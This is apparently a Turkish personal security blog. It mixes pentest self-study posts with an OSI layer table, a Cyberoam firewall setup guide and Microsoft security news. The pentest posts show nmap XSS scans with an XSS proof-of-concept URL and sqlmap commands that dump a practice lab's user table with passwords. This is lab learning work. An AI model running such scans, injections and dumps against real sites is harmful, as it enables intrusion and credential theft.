27 Şub 2020 @ 10:35 AM 

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

Posted By: admin
EmailPermalinkComments (1)
Tags
Categories: Uncategorized

 21 Şub 2017 @ 4:22 PM 

root@kali:~#nmap -p80 –script http-stored-xss –script-args=httpspider.maxpagecount=200 192.168.1.5

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-17 23:37 +03
Nmap scan report for 192.168.1.5
Host is up (0.00040s latency).
PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:D2:3E:90 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds

**********************************************

root@kali:~# nmap -p80 –script http-dombased-xss –script-args=httpspider.maxpagecount=200 192.168.1.5

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-17 23:39 +03
Nmap scan report for 192.168.1.5
Host is up (0.00030s latency).
PORT STATE SERVICE
80/tcp open http
| http-dombased-xss:
| Spidering limited to: maxdepth=3; maxpagecount=200; withinhost=192.168.1.5
| Found the following indications of potential DOM based XSS:
|
| Source: document.write(location.hash.substring(1)
|_ Pages: http://192.168.1.5/xss/example9.php#hacker
MAC Address: 00:0C:29:D2:3E:90 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.91 seconds

****************************************************************

root@kali:~# nmap -p80 –script http-phpself-xss –script-args=httpspider.maxpagecount=200 192.168.1.5

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-17 23:40 +03
Nmap scan report for 192.168.1.5
Host is up (0.00029s latency).
PORT STATE SERVICE
80/tcp open http
| http-phpself-xss:
| VULNERABLE:
| Unsafe use of $_SERVER[“PHP_SELF”] in PHP files
| State: VULNERABLE (Exploitable)
| PHP files are not handling safely the variable $_SERVER[“PHP_SELF”] causing Reflected Cross Site Scripting vulnerabilities.
|
| Extra information:
|
| Vulnerable files with proof of concept:
| http://192.168.1.5/xss/example8.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
| Spidering limited to: maxdepth=3; maxpagecount=200; withinhost=192.168.1.5
| References:
| https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
|_ http://php.net/manual/en/reserved.variables.server.php
MAC Address: 00:0C:29:D2:3E:90 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.76 seconds


 

xsser

 
 19 Oca 2017 @ 4:24 PM 

xsser -c100 –Cw=4 -u http://192.168.1.5

===========================================================================

Mosquito(es) landed!

===========================================================================
[*] Final Results:
===========================================================================

– Injections: 34
– Failed: 21
– Sucessfull: 13
– Accur: 38 %

===========================================================================
[*] List of possible XSS injections:

Posted By: admin
EmailPermalinkComments (0)
Tags
Tags: ,
Categories: Pentest Çalışmlarım

 18 Şub 2016 @ 11:29 AM 

SQLmap kullanım testlerini yapabilmemiz için https://pentesterlab.com/exercises/web_for_pentester adresinden indirdim. Hazır iso dosyasının kurulumunu yaptım

sqlinjetions ve diğer açıklarla ilgili örnekleri yapabilmemiz için hazır ….

database ismini buluyoruz..

sqlmap -u “http://192.168.1.8/sqli/example5.php?id=2″ –dbs

şimdi table ‘ları buluyoruz.

sqlmap -u “http://192.168.1.8/sqli/example5.php?id=2″ –tables -D exercises

Database: exercises
[1 table]
+——-+
| users |
+——-+

tek tablomuz varmış…

*******************************

Columns buluyoruz…

sqlmap -u “http://192.168.1.8/sqli/example5.php?id=2″ –columns -D exercises -T users

Database: exercises
Table: users
[5 columns]
+———+————-+
| Column  | Type        |
+———+————-+
| age     | int(11)     |
| groupid | int(11)     |
| id      | int(11)     |
| name    | varchar(50) |
| passwd  | varchar(50) |
+———+————-+
************************************************

şimdi içerikleri görelim

sqlmap -u “http://192.168.1.8/sqli/example5.php?id=2″ –dump -D exercises -T users

Database: exercises
Table: users
[4 entries]
+—-+———+—–+——-+———+
| id | groupid | age | name  | passwd  |
+—-+———+—–+——-+———+
| 1  | 10      | 10  | admin | admin   |
| 2  | 0       | 30  | root  | admin21 |
| 3  | 2       | 5   | user1 | secret  |
| 5  | 5       | 2   | user2 | azerty  |
+—-+———+—–+——-+———+
************************************************************

Posted By: admin
EmailPermalinkComments (0)
Tags
Categories: Self Study

 16 May 2014 @ 4:26 PM 
Katman Veri birimi İşlevi[5] Örnekler
Sunucu
katmanları
7. Uygulama Veri Kaynak paylaşımı, uzaktan dosya erişimi, dizin hizmetleri veya sanal uçbirimler gibi üst seviye APIler NFS, SMB, AFP, FTAM, NCP
6. Sunum Ağ hizmeti ve uygulama arasında veri çevirisi, örneğin karakter kodlaması, veri sıkıştırma ve şifreleme/şifre çözme CSS, GIF, HTML, XML, JSON, S/MIME,
5. Oturum İletişim oturumlarının, yani iki düğüm arasında ileri ve geri aktarımlar şeklinde sürekli olarak gerçekleşen veri takası. RPC, SCP, PAP,TLS, FTP, HTTP, HTTPS, SMTP, SSH, Telnet
4. Taşıma Bölüt Veri bölümlerinin, bölütleme, alındılama ve çoğullama gibi işlemlerle ağ üzerinde noktalara güvenli bir şekilde iletilmesi. NBF, TCP, UDP
Ortam
katmanları
3. Ağ Paket/Datagram Çok düğümlü bir ağın, adreslendirme, yönlendirme (routing) ve trafik denetimi gibi süreçler kullanılarak yapılandırılması ve yönetilmesi. AppleTalk, ICMP, IPsec, IPv4, IPv6
2. Veri bağlantısı Bit/Çerçeve (Frame) Fiziksel bir katman aracılığıyla birbirine bağlı iki düğüm arasında veri çerçevelerinin güvenli bir şekilde iletilmesi IEEE 802.2, L2TP, LLDP, MAC, PPP, ATM, MPLS
1. Fiziksel Bit İşlenmemiş bit akışlarının fiizksel bir ortam üzerinden gönderilmesi ve teslim alınması DOCSIS, DSL, Ethernet physical layer, ISDN, RS-232

 01 Eyl 2013 @ 3:50 PM 

Cyberoam U.T.M (Unified Threat Management) cihazı   FIREWALL, VPN( IPSec, CISCOTM VPN Client, SSL, L2TP, PPTP ), IPS, WEB FILTER, APPLICATION FILTER, WAF, IM, QoS, ANTI VIRUS, ANTI SPAM desteği sağlamaktadır.

Cyberoam un default IP si 172.16.16.16/255.255.255.0  dır. Kurulum yapabilmemiz için IP mizi ayarlamamız gerekmektedir. Kullanıcı adı: cyberoam şifre: cyber

Anlatımımı Cyberoam CR300i Modeli ve  10.04.3 build 543 sürümü üzerinden yapıyorum.

Giriş ekranı gelmiyorsa ip ayarlarınızın doğruluğunu kontrol edin ayrıca yönetim kablonuzun Port A ya takılı olduğundan emin olun kurulum sadece Port A üzeinden yapılabilir.

Üstteki menüden Wizard a tıklaya cyberoam’ un kurulumuna başlıyoruz. Gelen ekranda Start diyerek ilerliyoruz.

Cyberoam U.T.M (Bütünleşik Tehdit Yönetimi) Kurulumunu iki şekilde yapabiliriz.

·         Gateway mode ( Route mode)

·     Bridge mode (Transparent mode)

Biz Gateway mode ile anlatımımıza devam edeceğiz.

Bu adımda PortA ayarlarını yapıyoruz. PortA LAN olarak ayarlayacağız. Local Networkümüzün IP ayarlarını yapıyoruz. Ben 192.168.0.1 /255.255.255.0 olarak ayarladım. Zone  LAN seçiyoruz. Next diyerek devam ediyoruz.

Bu adımda PortB ayarlarını yapıyoruz. PortB WAN olarak ayarlayacağız. Eğer ADSL kullanıcısı isek “obtain an ip from PPPoE” yi seçiyoruz. User name ve password kısımlarına ADSL bilgilerimizi giriyoruz. İnternetimiz Metro ethernet ise “Use Statik IP” seçeneğini seçiyoruz bize verilen IP adresini Subnet Mask ve Gateway Ip adress bilgilerini buraya giriyoruz.

Port C-D-E-F kurulumlarını da aynı şekilde yapabiliriz. Serverlarımız var ise DMZ zone seçilmeli ve serverlar bu portun arkasına bağlanmalı. Farklı lan yapımız olabilir Port D bunun için kullanabilir veya 2 adet internet çıkışımız olabilir Port E yi farlı bir WAN olarak tanımlayabiliriz. Senaryoları arttırabiliriz.

Sonraki Adımda DNS ayarlarımızı yapıyoruz. Eğer LAN ımızda DNS lerimiz varsa  IP lerini giriyoruz yok ise telekomun veya istediğimiz free DNS serverların Ip adreslerini girebiliriz.

Burada LAN dan WAN a doğru ilgili politikaları tanımlıyoruz. Cyberoam başlangıçta bize 3 seçenek sunuyor.

♦ Monitor Only : Sadece gözlem amaçlı kullanılır. Hiç bir trafiği engellemez. Kimlik doğrulaması istemez.
♦ General Internet Policy(Genel internet politikası) : Bu seçenekte de kimlik doğrulaması istemez.
Http trafiğini tarar virüs içermeyenlerin geçişine izin verir. Aşağıdaki kategorilerideki WEB sitelerini engeller. Porn, Nudity, Adult Content, URL Translation Sites, Drugs, Crime and Suicide, Gambling, Militancy and Extremist, Phishing and Fraud, Violence, Weapons.
♦ Strict Internet Policy (Sıkı internet Politikası ): Burada kullanıcı kimlik doğrulaması gerekmektedir.

Burada Mail server ayarlarımızı yapıyoruz. Uyarı mesajlarını email ile almak istersek bu ayaraları yapıyoruz. Kime gönderileceği, Mail server IP adresi ve portu, Kimden, ve kullanıcı şifre..

Sistem saatini Time zone ayarlamalarını yapıyoruz. Saat ve tarih bilgilerini internetten almasını sağlayabiliriz.

Yaptığımız ayarları burada gözden geçiriyoruz. Bir hata görüyorsanız geri dönüp düzeltebilirsiniz. Finish diyerek sonlandırıyoruz. Ayarlarımızın gerçekleşmesi Cyberoam için tekrar başlatılacak, biraz beklememiz gerekmektedir.

Genel Kurulumumuz Bitti.

IP ayarlarımızı değiştirdikten sonra tekrar giriş yapıyoruz. 192.168.0.1

Appliance information dan Konfigürasyanlora bakabiliriz. Özellikle dikkat etmemiz gereken Gateway status ‘ün yeşil olması.

Port larımızın Ip ayarlarını kontrol edelim ve problemli olanlar varsa buradan değiştirebiliriz.

Diğer Makalede görüşmek dileğiyle…


 15 Oca 2012 @ 12:05 PM 

6 aylık dönemler halinde yayınlanan Microsoft Güvenlik İstihbarat Raporu’nun ( Security Intelligence Report ) son dönem sonuçlarına göre, Türkiye’deki bilgi güvenliği ile ilgili yapılan tespitler endişe uyandıryor. Bu çalışma, dünyada bilgi güvenliği alanında en geniş örnek kümesine sahip araştırmalardan biri ve 600 milyon civarındaki bilgisayardan kullanıcıların izniyle paylaşılan sonuçlara dayalı olarak gerçekleştiriliyor.


Türkiye, son birkaç senedir dünyada 1000 bilgisayar başına düşen kötücül yazılım enfeksiyonu oranı itibarıyla en fazla enfeksiyona rastlanan ülkeler arasında yer alıyor. Son rapor sonuçlarına göre de Türkiye geçtiğimiz bir sene içerisinde 1000 bilgisayara 36.8 enfekte cihaz oranı ile lider olurken, İspanya (36.1), Kore (34.8), Tayvan (29.7) ve Brezilya (24.7) oranları ile Türkiye’yi izledi.
Ayrıca önceki dönemlere ait raporlarda Türkiye, SQL Enjeksiyonu olarak tabir edilen saldırı kategorisinde zaafiyet taşıyan “.tr” uzantılı 88.378 sayfa adedi ile de maalesef açık ara dünya lideriydi. Tüm “.com” uzantılı alanda bile 43.144 adet bu zaafiyeti taşıyan sayfa mevcutten Türkiye’de bunun iki katına denk gelen zaafiyeti taşıyan sayfa sayısının bulunması ciddi bir güvenlik tehdidini beraberinde getiriyor.
Microsoft Güvenlik İstihbarat Raporu’nun İngilizce olan tam sürümüne http://mstr.to/iVtb6x

 10 Tem 2011 @ 3:44 PM 

Temmuz 2010 – Haziran 2011 dönemini kapsayan Microsoft’un bir yılında, Microsoft Türkiye ekibi olarak siz müşterilerimizi daha memnun kılmak amacıyla var gücümüzle çalıştık. Bilişimin olduğu her yerde, Microsoft olarak bizler de olmaya çalıştık. Bu amaç doğrultusunda tüm bir yıl boyunca, başta Bilişim Zirvesi olmak üzere pek çok etkinliğe ev sahipliği yaptık, pek çok etkinlikte de sponsor olarak yer almanın keyfini yaşadık. Bilgi güvenliğinin önemi konusunda kişileri ve kurumları bilinçlendirmeyi kendisine misyon edinmiş bir ekip olarak, bu alanda pek çok etkinliğin gerçekleşmesine katkıda bulunduk. Bu haberimizde sizlere, geçtiğimiz bir yıl boyunca Microsoft Türkiye ekibi olarak bilgi güvenliği anlamında hangi etkinliklerde bulunduğumuzdan bahsetmek istiyoruz.

–  Microsoft Türkiye Bilişim Zirvesi 2011: 11 Mart Cuma günü İstanbul Kongre Merkezi’nde 5 bini aşkın profesyonelin katılımıyla Microsoft Türkiye Bilişim Zirvesi 2011′i gerçekleştirdik. Microsoft Türkiye olarak, BT sektörüne yön vereceğine inandığımız gelişmeleri vurgulamak amacıyla gerçekleştirdiğimiz bilişim zirvelerinin bir öncesini, 12 Mart 2008 tarihinde Lütfi Kırdar Kongre Merkezi’nde “Bilişim Kahramanları Aramızda“ başlığıyla gerçekleştirmiştik. Geçtiğimiz son birkaç yılda hayatımıza giren bulut bilişim kavramına dikkat çekmek amacıyla Microsoft Türkiye Bilişim Zirvesi 2011 gerçekleştirildi. Ana başlığı “Bulut Bilişim” olan zirvenin açılış konuşmasını yapan Microsoft Türkiye Genel Müdürü Tamer Özmen, Türkiye’nin bilişim alanında önemli bir yere sahip olduğunu vurguladı. Konuşmasında, Microsoft’un bulut bilişime yaptığı yatırımlardan bahseden Özmen, Microsoft’un hali hazırda 20 milyon işletmeye servis verebilecek bulut altyapısına sahip olduğunu belirtti. Zirve boyunca, bulut bilişimle birlikte bilgi güvenliği anlamında BT yönetimi ve güvenliği ile kurumsal kimlik yönetiminin önemi vurgulandı.

AnkaSEC’10 – Ankara Bilgi Güvenliği Konferansı: Microsoft olarak, Bilgi Güvenliği Akademisi tarafından “Güvenlik lüks değil, gereksinimdir.” ana temasıyla 23 Aralık günü gerçekleştirilen etkinliğe sponsor olmaktan mutluluk duyduk. Ankara’daki BT meraklılarına yönelik düzenlenen konferansta sanallaştırma güvenliği, bulut bilişim güvenliği, yeni nesil tehditler ve çözüm önerileri ile birçok başka konuya yer verildi.

–  EMEA Intelligence 2011: 10-12 Mart tarihlerinde Harbiye Askeri Müzesi’nde, 3 gün boyunca EMEA bölgesinden toplamda 1324 BT profesyonelinin ağırlandığı etkinlikte Microsoft olarak altın sponsor ünvanıyla yer aldık. Diğer sponsorları arasında Uluslararası İş Birliği ve Kalkınma Ajansı ile TÜBİTAK gibi kurumlar bulunan etkinlikte, özellikle istihbarat ve denetim teknolojileri üzerinde duruldu.

– ISSA – Microsoft Kurumsal Güvenlik Seminerleri Dizisi: The Information System Security Association (ISSA), bilişim sistemleri ve güvenliği bilincini profesyonel düzeye çekmeyi amaçlayan, bünyesinde bilgi güvenliği profesyonelleri ve çalışanlarını barındıran, kâr amacı gütmeyen uluslararası bir kuruluştur. Daha güvenli bir BT parolasıyla yola çıkan ISSA ve Microsoft olarak; Şubat, Mart, Nisan ve Haziran aylarında Microsoft İstanbul Ofisi’nde dört güvenlik semineri gerçekleştirdik.

– ISSA Turkey Grand Security Conference (ITGSC): Microsoft olarak, ISSA tarafından bu yıl 4-5 Haziran tarihlerinde ikincisi gerçekleştirilen ITGSC Güvenlik Konferansı’na ikinci kez ev sahipliği yapmaktan mutluluk duyduk. Yalnızca BT profesyonellerine ulaşmayı hedefleyen etkinlikte, iki gün boyunca yirmiyi aşkın sunum gerçekleştirildi ve BT yönetimi, risk yönetimi, BT güvenliği, adli bilişim ve hukuki boyutlar ile ilgili konulara yer verildi.

– İstSEC’11 – İstanbul Bilgi Güvenliği Konferansı: Bilgi Güvenliği Akademisi tarafından “Yeni teknolojiler, yeni güvenlik riskleri” temasıyla 3-4 Haziran tarihlerinde Microsoft sponsorluğunda gerçekleştirilen konferansta internet yasaklarının teknik ve hukuki boyutları, sanallaştırma güvenliği, bulut bilişim güvenliği, CEO ve CIO’lar için yeni nesil güvenlik ve siber tehditler ile birçok başka konu incelendi.

– NetSEC Topluluğu İstanbul Buluşması ve Siber Saldırı Aracı Olarak DDos Etkinliği: NetSec Ağ ve Bilgi Güvenliği Topluluğu, 30 Nisan günü “Web Uygulama Güvenliği” konusunda bilgi paylaşma amacıyla, Microsoft sponsorluğunda Bellevue Residences’ta buluştu. Buluşmada web uygulamalarında sık karşılaşılan güvenlik problemleri ve ilginç açıklar, bulut bilişim güvenliği ile bazı başka konulara değinildi. Bilgi Güvenliği Akademisi tarafından, 5 Temmuz tarihinde Microsoft sponsorluğunda gerçekleştirilen “Siber Saldırı Aracı Olarak DDos” etkinliğinde, son dönemin gözde saldırı yöntemi DDos saldırıları derinlemesine incelendi.

Alıntı: Ozan Gündüz

http://blog.microsoft.com.tr/microsoft-guvenlik-ekosistemini-destekliyor.html






 Last 50 Posts
Change Theme...
  • Users » 1
  • Posts/Pages » 10
  • Comments » 1
Change Theme...
  • VoidVoid « Default
  • LifeLife
  • EarthEarth
  • WindWind
  • WaterWater
  • FireFire
  • LightLight

Sample Page



    No Child Pages.

About



    No Child Pages.